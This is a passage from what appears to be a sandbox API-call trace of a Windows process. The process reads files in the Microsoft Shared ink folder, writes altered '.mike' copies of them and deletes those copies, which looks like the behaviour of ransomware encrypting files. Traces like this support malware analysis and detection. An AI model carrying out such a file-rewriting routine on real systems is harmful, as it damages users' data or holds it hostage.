returned 0x1 [0043.764] WriteFile (in: hFile=0x264, lpBuffer=0x218b540*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x218b540*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.764] CloseHandle (hObject=0x264) returned 1 [0043.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.765] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4482f80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4482f80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44a90e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc90)) returned 1 [0043.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.766] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x218cbf0 | out: lpFileInformation=0x218cbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4482f80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4482f80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44a90e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc90)) returned 1 [0043.766] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", dwFileAttributes=0x80) returned 0 [0043.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.767] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4482f80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4482f80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44a90e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc90)) returned 1 [0043.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.767] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike")) returned 1 [0043.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.771] GetFileType (hFile=0x264) returned 0x1 [0043.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.771] GetFileType (hFile=0x264) returned 0x1 [0043.771] CloseHandle (hObject=0x264) returned 1 [0043.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.772] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), fInfoLevelId=0x0, lpFileInformation=0x218eb50 | out: lpFileInformation=0x218eb50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44)) returned 1 [0043.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), fInfoLevelId=0x0, lpFileInformation=0x218ee40 | out: lpFileInformation=0x218ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44)) returned 1 [0043.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.774] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.774] GetFileType (hFile=0x264) returned 0x1 [0043.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.774] GetFileType (hFile=0x264) returned 0x1 [0043.775] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.775] WriteFile (in: hFile=0x264, lpBuffer=0x218fb94*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x218fb94*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.776] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), fInfoLevelId=0x0, lpFileInformation=0x218f6d8 | out: lpFileInformation=0x218f6d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44)) returned 1 [0043.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.776] GetFileType (hFile=0x264) returned 0x1 [0043.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.776] GetFileType (hFile=0x264) returned 0x1 [0043.776] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.776] ReadFile (in: hFile=0x264, lpBuffer=0x2190ca8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2190ca8*, lpNumberOfBytesRead=0x2af0c8*=0xa44, lpOverlapped=0x0) returned 1 [0043.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.778] GetFileType (hFile=0x264) returned 0x1 [0043.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.778] GetFileType (hFile=0x264) returned 0x1 [0043.778] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.778] WriteFile (in: hFile=0x264, lpBuffer=0x2197900*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2197900*, lpNumberOfBytesWritten=0x2af0bc*=0xa50, lpOverlapped=0x0) returned 1 [0043.779] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.779] GetFileType (hFile=0x264) returned 0x1 [0043.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.779] GetFileType (hFile=0x264) returned 0x1 [0043.780] WriteFile (in: hFile=0x264, lpBuffer=0x219ab14*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x219ab14*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.780] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44a90e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44a90e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44cf240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.781] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x219c1c4 | out: lpFileInformation=0x219c1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44a90e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44a90e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44cf240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", dwFileAttributes=0x80) returned 0 [0043.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.782] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44a90e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe44a90e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe44cf240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpFilePart=0x0) returned 0x3d [0043.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike", lpFilePart=0x0) returned 0x42 [0043.782] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.mike")) returned 1 [0043.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpFilePart=0x0) returned 0x3d [0043.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", nBufferLength=0x105, lpBuffer=0x2aec28, 